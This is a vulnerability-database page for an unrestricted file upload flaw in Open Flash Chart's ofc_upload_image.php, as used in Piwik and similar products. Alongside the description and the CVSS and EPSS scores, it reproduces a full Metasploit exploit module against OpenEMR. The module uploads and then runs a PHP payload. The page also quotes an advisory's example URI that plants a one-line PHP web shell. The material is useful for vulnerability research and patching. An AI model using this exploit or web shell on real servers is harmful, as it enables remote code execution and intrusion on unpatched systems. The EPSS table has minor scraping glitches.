CPE, which stands for Common Platform Enumeration, is a standardized scheme for naming hardware, software, and operating systems. CPE provides a structured naming scheme to uniquely identify and classify information technology systems, platforms, and packages based on certain attributes such as vendor, product name, version, update, edition, and language.
CWE, or Common Weakness Enumeration, is a comprehensive list and categorization of software weaknesses and vulnerabilities. It serves as a common language for describing software security weaknesses in architecture, design, code, or implementation that can lead to vulnerabilities.
CAPEC, which stands for Common Attack Pattern Enumeration and Classification, is a comprehensive, publicly available resource that documents common patterns of attack employed by adversaries in cyber attacks. This knowledge base aims to understand and articulate common vulnerabilities and the methods attackers use to exploit them.
Services & Price
Help & Info
Search : CVE id, CWE id, CAPEC id, vendor or keywords in CVE
Unrestricted file upload vulnerability in ofc_upload_image.php in Open Flash Chart v2 Beta 1 through v2 Lug Wyrm Charmer, as used in Piwik 0.2.35 through 0.4.3, Woopra Analytics Plugin before 1.4.3.2, and possibly other products, when register_globals is enabled, allows remote authenticated users to execute arbitrary code by uploading a file with an executable extension through the name parameter with the code in the HTTP_RAW_POST_DATA parameter, then accessing it via a direct request to the file in tmp-upload-images/.
CVE Informations
Metrics
Metrics
Score
Severity
CVSS Vector
Source
V2
7.5
AV:N/AC:L/Au:N/C:P/I:P/A:P
nvd@nist.gov
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
90.82%
–
–
2023-03-12
–
–
–
97.28%
–
2023-07-09
–
–
–
97.26%
–
2023-10-01
–
–
–
97.12%
–
2023-11-12
–
–
–
97.2%
–
2023-12-31
–
–
–
97.28%
–
2024-06-02
–
–
–
97.28%
–
2024-12-22
–
–
–
96.95%
–
2025-02-16
–
–
–
96.98%
–
2025-01-19
–
–
–
96.95%
–
2025-02-16
–
–
–
96.98%
–
2025-03-18
–
–
–
–
91.45%
2025-03-30
–
–
–
–
91.75%
2025-04-12
–
–
–
–
87.03%
2025-04-13
–
–
–
–
91.75%
2025-04-13
–
–
–
–
91.75,%
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info={})
super(update_info(info,
'Name' => "OpenEMR PHP File Upload Vulnerability",
'Description' => %q{
This module exploits a vulnerability found in OpenEMR 4.1.1 By abusing the
ofc_upload_image.php file from the openflashchart library, a malicious user can
upload a file to the tmp-upload-images directory without any authentication, which
results in arbitrary code execution. The module has been tested successfully on
OpenEMR 4.1.1 over Ubuntu 10.04.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Gjoko Krstic <gjoko[at]zeroscience.mk>', # Discovery, PoC
'juan vazquez' # Metasploit module
],
'References' =>
[
[ 'OSVDB', '90222' ],
[ 'BID', '37314' ],
[ 'EBD', '24492' ],
[ 'URL', 'http://www.zeroscience.mk/en/vulnerabilities/ZSL-2013-5126.php' ],
[ 'URL', 'http://www.open-emr.org/wiki/index.php/OpenEMR_Patches' ]
],
'Platform' => ['php'],
'Arch' => ARCH_PHP,
'Targets' =>
[
['OpenEMR 4.1.1', {}]
],
'Privileged' => false,
'DisclosureDate' => "Feb 13 2013",
'DefaultTarget' => 0))
register_options(
[
OptString.new('TARGETURI', [true, 'The base path to EGallery', '/openemr'])
], self.class)
end
def check
uri = target_uri.path
peer = "#{rhost}:#{rport}"
# Check version
print_status("#{peer} - Trying to detect installed version")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(uri, "interface", "login", "login.php")
})
if res and res.code == 200 and res.body =~ /v(\d\.\d\.\d)/
version = $1
else
return Exploit::CheckCode::Unknown
end
print_status("#{peer} - Version #{version} detected")
if version > "4.1.1"
return Exploit::CheckCode::Safe
end
# Check for vulnerable component
print_status("#{peer} - Trying to detect the vulnerable component")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri("#{uri}", "library", "openflashchart", "php-ofc-library", "ofc_upload_image.php"),
})
if res and res.code == 200 and res.body =~ /Saving your image to/
return Exploit::CheckCode::Detected
end
return Exploit::CheckCode::Safe
end
def exploit
uri = target_uri.path
peer = "#{rhost}:#{rport}"
payload_name = rand_text_alpha(rand(10) + 5) + '.php'
my_payload = payload.encoded
print_status("#{peer} - Sending PHP payload (#{payload_name})")
res = send_request_raw({
'method' => 'POST',
'uri' => normalize_uri("#{uri}", "library", "openflashchart", "php-ofc-library", "ofc_upload_image.php") + "?name=#{payload_name}",
'headers' => { "Content-Length" => my_payload.length.to_s },
'data' => my_payload
})
# If the server returns 200 and the body contains our payload name,
# we assume we uploaded the malicious file successfully
if not res or res.code != 200 or res.body !~ /Saving your image to.*#{payload_name}$/
fail_with(Exploit::Failure::NotVulnerable, "#{peer} - File wasn't uploaded, aborting!")
end
register_file_for_cleanup(payload_name)
print_status("#{peer} - Executing PHP payload (#{payload_name})")
# Execute our payload
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri("#{uri}", "library", "openflashchart", "tmp-upload-images", payload_name),
})
# If we don't get a 200 when we request our malicious payload, we suspect
# we don't have a shell, either. Print the status code for debugging purposes.
if res and res.code != 200
print_error("#{peer} - Server returned #{res.code.to_s}")
end
end
end
Publication date : 2009-12-16 23h00 +00:00 Author : Braeden Thomas EDB Verified : No
Bugtraq ID: 37314
Class: Input Validation Error
CVE:
Remote: Yes
Local: No
Published: Dec 14 2009 12:00AM
Updated: Dec 17 2009 06:03PM
Credit: Braeden Thomas
Vulnerable: Piwik Piwik 0.4.3
Piwik Piwik 0.4.2
Piwik Piwik 0.4.1
Piwik Piwik 0.4
Piwik Piwik 0.2.37
Piwik Piwik 0.2.36
Piwik Piwik 0.2.35
Open Web Analytics Open Web Analytics 1.2.0
Open Flash Chart Open Flash Chart 2.0
Open Flash Chart is prone to a vulnerability that lets remote attackers execute arbitrary code because the application fails to sanitize user-supplied input.
Attackers can exploit this issue to execute arbitrary PHP code within the context of the affected webserver process.
Open Flash Chart 2 Beta 1 and Open Flash Chart 2 are vulnerable; other versions may also be affected.
The following example URI is available:
http://server/libs/open-flash-chart/php-ofc-library/ofc_upload_image.php?name=shell.php&HTTP_RAW_POST_DATA=<?system($_GET['cmd']);?>